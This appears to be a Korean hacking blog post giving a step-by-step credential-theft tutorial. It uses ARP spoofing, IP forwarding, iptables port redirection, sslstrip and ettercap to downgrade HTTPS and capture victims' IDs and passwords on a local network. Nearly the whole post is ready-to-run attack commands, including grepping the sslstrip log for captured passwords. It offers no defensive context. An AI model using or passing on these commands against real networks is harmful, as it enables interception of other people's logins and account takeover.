이번에는 sslstrip을 이용하여 id, pw를 가로채는 것을 해보겠다.
SSLStrip 공격이란?
- HTTPS 통신 과정에서 https -> http 로 변경하여 암호화 통신을 방해함
- 동일한 NW환경 혹은 피해자의 트래픽을 수집할 수 있는 환경이어야 함
1) arp spoofing : 사용자의 패킷 -> 공격자
2) 사용자의 패킷이 라우팅이 되도록 ip_forward
3) sslstrip 공격 수행
(http://www.iblue.kr/xe/index.php?document_srl=116044&mid=board_OSMt72 발췌)
1. ip_forward가 가능하도록 설정
#echo 1 > /proc/sys/net/ipv4/ip_forward
2. arpspoofing 작동
#arpspoof -t victim-ip gw-ip
3. iptables rule 설정
#iptables --flush
#iptables -t nat -A PREROUTING -p tcp
--destination-port 80 -j REDIRECT
--to-ports 8080 //위에는 port 밑에는 ports 주의
sslstrip 작동시키기
이번에도 역시 사이트는 공개하지 않기로 한다.
희생자가 해당 사이트에 접속하여 id와 pw를 입력할 경우
아래의 화면을 확인할 수 있다.
#cat sslstrip.log | grep -a id값(또는 pass)
다음으로는 ettercap을 이용한 HTTPS 도청 방법이다.
1. /etc/ettercap/etter.conf 수정 (http://kkn1220.tistory.com/32 참고)
2. enable ip_forward
#echo 1 > /proc/sys/net/ipv4/ip_forward
3. arpspoof 실행
#arpsppof -t victim_ip gw_ip
4. iptables_rules 설정
#iptables --flush
#iptables -t nat -A PREROUTING -p tcp
--destination-port 80 -j REDIRECT
--to-ports 10000
5. sslstrip 실행
#sslstrip -a -k -f
6. ettercap 가동
#ettercap -T -q -i eth0
7. 희생자는 사이트 접속 후 id, pw 입력
역시 이 또한 가능하다는 것을 확인해 볼 수 있다.
네이x, goox, 다x 등 대형 포털사이트는 막힘
2016-02-03
'해킹 > 해킹' 카테고리의 다른 글
kali 를 이용한 안드로이드 해킹 (3) | 2015.08.27 |
---|---|
kali metasploit 소개 (0) | 2015.08.27 |
kali ettercap을 활용한 패스워드 도청 (1) | 2015.08.27 |
kali setoolkit 사용 (1) | 2015.08.27 |
kali linux 설치 (0) | 2015.08.27 |